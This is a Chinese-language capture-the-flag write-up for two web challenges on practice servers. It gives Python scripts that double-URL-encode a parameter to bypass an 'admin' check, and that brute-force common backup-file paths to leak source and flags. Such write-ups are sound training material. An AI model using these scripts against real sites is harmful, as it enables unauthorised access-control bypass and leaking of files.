打开题目场景,得到如下界面
法一:
在url后面添加index.phps发现代码泄露,查看网页源码,审计代码,首先不能admin等于get传过来的值,又要使admin等于get传值在get传值之前有一个urldecode函数构造payload,得到flag
法二:python脚本编写
import requests from urllib.parse import quote url='http://61.147.171.105:52593/index.php?id=' encoded_id=''.join('%'+hex(ord(c))[2:] for c in 'admin') encoded_id2=''. join('%'+hex(ord(c))[2:] for c in encoded_id) target_url =url + encoded_id2 print(target_url) response = requests.get(target_url) if 'cyberpeace{' in response.text: flag_start=response.text.index("cyberpeace{") key_end =response.text.index('}',flag_start)+1 flag=response.text[flag_start:key_end] print("存在 flag:"+flag) else: print("未找到 flag")
打开题目场景得到如下界面:
法一:常见的备份文件后缀名有: .git .svn .swp .svn .~ .bak .bash_history,逐个试发flag
法二:编写python脚本
import requests url = 'http://61.147.171.105:49902/' dictionary = 'php.txt' with open(dictionary, "r") as file: paths = file.read().splitlines() for path in paths: target_url = url + path response = requests.get(target_url) if"Cyberpeace{"in response.text: flag_start=response.text.index("Cyberpeace") flag_end = response.text.index('}', flag_start) + 1 flag = response.text[flag_start:flag_end] print("路径爆破成功:"+target_url) print("flag:" + flag) break else: print("路径爆破失败,未找到flag")